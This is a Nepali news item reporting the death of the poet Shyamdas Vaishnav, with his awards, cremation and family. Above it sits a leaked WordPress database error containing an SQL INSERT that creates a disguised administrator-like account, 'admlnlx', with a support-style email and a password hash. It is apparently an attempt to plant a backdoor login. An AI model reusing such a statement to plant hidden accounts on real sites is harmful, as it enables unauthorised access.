WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bdtd7/Pm/Q356giW4gSs2jZ0g8UPeq/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 17:34:12', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । वरिष्ठ साहित्यकार श्यामदास वैष्णवको गए राति आफ्नै निवास ज्ञानेश्वरमा निधन भएको छ । विसं २०७२ देखि मनोरोगले पीडित उहाँको पशुपति आर्यघाटमा अन्त्येष्टि गरिएको छ ।
महाकवि लक्ष्मीप्रसाद देवकोटाका अतिप्रय चेला भक्त मानिने वैष्णवका कवितासङ्ग्रह र गीतिनाटक गरेर सात वटा कृति प्रकाशित छन् । वैष्णवले गोरखादक्षिण बाहु, महेन्द्र प्रज्ञापुरस्कार, त्रिमूर्ति, देवकोटा शताब्दी, भानुभक्त, मुक्ति र नइ देरूनीख प्रदीप्ति आदि पुरस्कार पाएको थियो ।
विसं १९८१ साउन ५ गते काठमाडौँमा जन्मनुभएका वैष्णवका श्रीमती, तीन छोरा र चार छोरी छन् । यसैबीच नई प्रकाशनले वैष्णवको निधनमा श्रद्धाञ्जलि व्यक्त गरेको छ । रासस